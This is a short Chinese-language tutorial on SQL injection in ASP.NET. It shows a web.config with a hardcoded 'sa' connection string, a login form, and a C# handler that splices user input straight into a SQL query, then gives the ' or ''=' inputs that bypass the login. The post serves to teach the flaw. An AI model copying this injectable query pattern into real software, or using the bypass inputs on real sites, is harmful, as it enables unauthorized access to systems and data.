Asp.net SQL注入实例分享
1.web.config里加链接字段:
<configuration>
<connectionStrings >
<add name="myConnectionString"
connectionString="Server=10.231.248.177;Database=testdb;User ID=sa;Password=pa$$word;Trusted_Connection=False;"
providerName="System.Data.SqlClient"/>
</connectionStrings>
2.拖几个控件在form里:
<form id="form1" runat="server">
<asp:Label ID="LU" runat="server" Text="User Name:"></asp:Label>
<asp:TextBox ID="TBU" runat="server"></asp:TextBox>
<br/>
<asp:Label ID="LP" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="TBP" runat="server"></asp:TextBox>
<br/>
<asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" />
<div>
3.写登录事件:
protected void Login_Click(object sender, EventArgs e)
{
using(SqlConnection con = new SqlConnection(WebConfigurationManager.ConnectionStrings["myConnectionString"].ConnectionString))
{
con.Open();
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "SELECT Count(1) FROM [User] where UserName='" + TBU.Text.Trim() + "' and Password='" + TBP.Text.Trim() + "'";
cmd.CommandType = CommandType.Text;
cmd.Connection = con;
int count =(int) cmd.ExecuteScalar();
Response.Write(cmd.CommandText);
if (count > 0)
{
Response.Write("<script>alert('Login pass!');</script>");
}
else
{
Response.Write("<script>alert('Login fail!');</script>");
}
}
}
4.构造SQL注入登录:
用户名输入:test' or ''='
密码输入:' or ''='
或者
用户名输入:test
密码输入:' or ''='
如图:
其他ASP.net SQL注入的例子,如果有兴趣可以参考下:
http://www.codeproject.com/Articles/459324/Understading-SQL-Injection-and-Creating-SQL-Inject
http://blogs.iis.net/nazim/sql-injection-demo
其他的SQL注入:http://www.unixwiz.net/techtips/sql-injection.html
